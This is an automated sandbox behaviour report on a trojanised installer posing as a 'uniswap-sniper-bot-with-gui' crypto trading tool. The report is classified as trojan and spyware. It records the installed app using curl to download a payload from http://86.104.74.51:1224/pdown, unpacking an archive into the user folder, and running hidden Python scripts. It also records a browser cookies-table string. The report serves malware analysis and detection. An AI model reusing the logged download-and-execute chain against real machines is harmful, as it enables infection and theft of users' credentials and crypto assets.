Source: libGLESv2.dll.0.dr	Static PE information: Number of sections : 12 > 10
Source: vulkan-1.dll.0.dr	Static PE information: Number of sections : 12 > 10
Source: ffmpeg.dll.0.dr	Static PE information: Number of sections : 11 > 10
Source: vulkan-1.dll0.0.dr	Static PE information: Number of sections : 12 > 10
Source: libEGL.dll.0.dr	Static PE information: Number of sections : 12 > 10
Source: vk_swiftshader.dll0.0.dr	Static PE information: Number of sections : 12 > 10
Source: uniswap-sniper-bot-with-gui.exe0.0.dr	Static PE information: Number of sections : 15 > 10
Source: vk_swiftshader.dll.0.dr	Static PE information: Number of sections : 12 > 10
Source: libGLESv2.dll0.0.dr	Static PE information: Number of sections : 12 > 10
Source: libEGL.dll0.0.dr	Static PE information: Number of sections : 12 > 10
Source: uniswap-sniper-bot-with-gui.exe.0.dr	Static PE information: Number of sections : 15 > 10
Source: ffmpeg.dll0.0.dr	Static PE information: Number of sections : 11 > 10

Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dllb! vs uniswap-sniper-bot-with-gui Setup 1.0.0.exe
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1900305482.0000000006040000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs uniswap-sniper-bot-with-gui Setup 1.0.0.exe
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1996793114.0000000006020000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevk_swiftshader.dll, vs uniswap-sniper-bot-with-gui Setup 1.0.0.exe

Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal60.troj.spyw.winEXE@48/1644@4/4

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe

File created: C:\Users\user\AppData\Local\Programs

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1368:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Mutant created: \Sessions\1\BaseNamedObjects\deed1b2d-6a1c-5708-934a-7202254448da
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5100:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe

File created: C:\Users\user\AppData\Local\Temp\nsc312.tmp

Jump to behavior

Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'UNISWAP-SNIPER-BOT-WITH-GUI.EXE'

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT name FROM sqlite_master WHERE type='table';
Source: uniswap-sniper-bot-with-gui.exe, 00000008.00000000.2096036514.00007FF6D6009000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE cookies(creation_utc INTEGER NOT NULL,host_key TEXT NOT NULL,top_frame_site_key TEXT NOT NULL,name TEXT NOT NULL,value TEXT NOT NULL,encrypted_value BLOB NOT NULL,path TEXT NOT NULL,expires_utc INTEGER NOT NULL,is_secure INTEGER NOT NULL,is_httponly INTEGER NOT NULL,last_access_utc INTEGER NOT NULL,has_expires INTEGER NOT NULL,is_persistent INTEGER NOT NULL,priority INTEGER NOT NULL,samesite INTEGER NOT NULL,source_scheme INTEGER NOT NULL,source_port INTEGER NOT NULL,is_same_party INTEGER NOT NULL);

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe

File read: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe "C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe"
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv \| "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe"
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://86.104.74.51:1224/pdown""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://86.104.74.51:1224/pdown"
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1780 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --mojo-platform-channel-handle=2052 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --app-path="C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar" --no-sandbox --no-zygote --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --launch-time-ticks=4496754429 --mojo-platform-channel-handle=2376 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tar.exe tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1016 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\.pyp\python.exe" "C:\Users\user/.sysinfo""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\.pyp\python.exe "C:\Users\user\.pyp\python.exe" "C:\Users\user/.sysinfo"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Users\user\.pyp\python.exe C:\Users\user\.pyp\python.exe C:\Users\user\.n2/pay
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Users\user\.pyp\python.exe C:\Users\user\.pyp\python.exe C:\Users\user\.n2/bow
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpa8kcau3f.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Users\user\.pyp\python.exe C:\Users\user\.pyp\python.exe C:\Users\user\.n2/mlip
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv \| "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://86.104.74.51:1224/pdown""	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1780 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --mojo-platform-channel-handle=2052 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --app-path="C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar" --no-sandbox --no-zygote --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --launch-time-ticks=4496754429 --mojo-platform-channel-handle=2376 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1016 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\.pyp\python.exe" "C:\Users\user/.sysinfo""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://86.104.74.51:1224/pdown"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tar.exe tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\.pyp\python.exe "C:\Users\user\.pyp\python.exe" "C:\Users\user/.sysinfo"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Users\user\.pyp\python.exe C:\Users\user\.pyp\python.exe C:\Users\user\.n2/pay
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Users\user\.pyp\python.exe C:\Users\user\.pyp\python.exe C:\Users\user\.n2/bow
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Users\user\.pyp\python.exe C:\Users\user\.pyp\python.exe C:\Users\user\.n2/mlip
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpa8kcau3f.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath "

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: ffmpeg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: userenv.dll	Jump to behavior
